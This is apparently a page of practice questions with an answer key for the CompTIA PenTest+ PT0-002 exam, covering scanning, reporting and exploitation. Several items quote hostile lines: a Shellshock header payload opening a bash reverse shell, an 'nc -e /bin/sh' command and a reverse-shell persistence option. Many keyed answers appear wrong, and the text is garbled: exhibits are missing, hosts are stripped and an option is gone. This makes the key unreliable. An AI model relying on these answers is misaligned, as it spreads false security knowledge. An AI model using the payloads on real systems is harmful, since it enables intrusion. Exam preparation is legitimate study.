
Free PT0-002 Demo Online for CompTIA Certification:

A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
• The following request was intercepted going to the network device:
GET /login HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
• Network management interfaces are available on the production network.
• An Nmap scan returned the following:
[Exhibit: Nmap scan output, image not available]
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

  • A. Enforce enhanced password complexity requirements.
  • B. Disable or upgrade SSH daemon.
  • C. Disable HTTP/301 redirect configuration.
  • D. Create an out-of-band network for management.
  • E. Implement a better method for authentication.
  • F. Eliminate network management and control interfaces.

Answer: CE

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

  • A. S/MIME
  • B. FTPS
  • D. AS2

Answer: A

A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

  • A. Badge cloning
  • B. Dumpster diving
  • C. Tailgating
  • D. Shoulder surfing

Answer: B

A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

  • A. Create a one-shot systemd service to establish a reverse shell.
  • B. Obtain /etc/shadow and brute force the root password.
  • C. Run the nc -e /bin/sh <...> command.
  • D. Move laterally to create a user account on LDAP.

Answer: A


An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?

  • A. Uncover potential criminal activity based on the evidence gathered.
  • B. Identify all the vulnerabilities in the environment.
  • C. Limit invasiveness based on scope.
  • D. Maintain confidentiality of the findings.

Answer: C

Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

  • A. The CVSS score of the finding
  • B. The network location of the vulnerable device
  • C. The vulnerability identifier
  • D. The client acceptance form
  • E. The name of the person who found the flaw
  • F. The tool used to find the issue

Answer: CF

A penetration tester discovers a vulnerable web server at The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/ 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

Answer: D

A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

  • A. Implement a recurring cybersecurity awareness education program for all users.
  • B. Implement multifactor authentication on all corporate applications.
  • C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
  • D. Implement an email security gateway to block spam and malware from email communications.

Answer: A

A penetration tester conducted a discovery scan that generated the following:
[Exhibit: discovery scan output, image not available]
Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

  • A. nmap -oG list.txt , sort
  • B. nmap -sn , grep "Nmap scan" | awk '{print $5}'
  • C. nmap --open, uniq
  • D. nmap -o, cut -f 2

Answer: D

A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

  • A. Cross-site request forgery
  • B. Server-side request forgery
  • C. Remote file inclusion
  • D. Local file inclusion

Answer: B

A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap -O -A -sS -p-
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

  • A. A firewall or IPS blocked the scan.
  • B. The penetration tester used unsupported flags.
  • C. The edge network device was disconnected.
  • D. The scan returned ICMP echo replies.

Answer: A

A penetration tester writes the following script:
[Exhibit: script, image not available]
Which of the following objectives is the tester attempting to achieve?

  • A. Determine active hosts on the network.
  • B. Set the TTL of ping packets for stealth.
  • C. Fill the ARP table of the networked devices.
  • D. Scan the system on the most used ports.

Answer: A

A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

  • A. nmap -vv -sUV -p 53, 123-159 -oA udpscan
  • B. nmap -vv -sUV -p 53,123,161-162 -oA udpscan
  • C. nmap -vv -sUV -p 53,137-139,161-162 -oA udpscan
  • D. nmap -vv -sUV -p 53, 122-123, 160-161 -oA udpscan

Answer: B

A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

  • A. Weekly
  • B. Monthly
  • C. Quarterly
  • D. Annually

Answer: A

Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

  • A. A quick description of the vulnerability and a high-level control to fix it
  • B. Information regarding the business impact if compromised
  • C. The executive summary and information regarding the testing company
  • D. The rules of engagement from the assessment

Answer: B

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name-serial_number>. Which of the following would be the best action for the tester to take NEXT with this information?

  • A. Create a custom password dictionary as preparation for password spray testing.
  • B. Recommend using a password manager/vault instead of text files to store passwords securely.
  • C. Recommend configuring password complexity rules in all the systems and applications.
  • D. Document the unprotected file repository as a finding in the penetration-testing report.

Answer: D

A penetration tester runs the following command on a system:
find / -user root -perm -4000 -print 2>/dev/null
Which of the following is the tester trying to accomplish?

  • A. Set the SGID on all files in the / directory
  • B. Find the /root directory on the system
  • C. Find files with the SUID bit set
  • D. Find files that were created during exploitation and move them to /dev/null

Answer: C

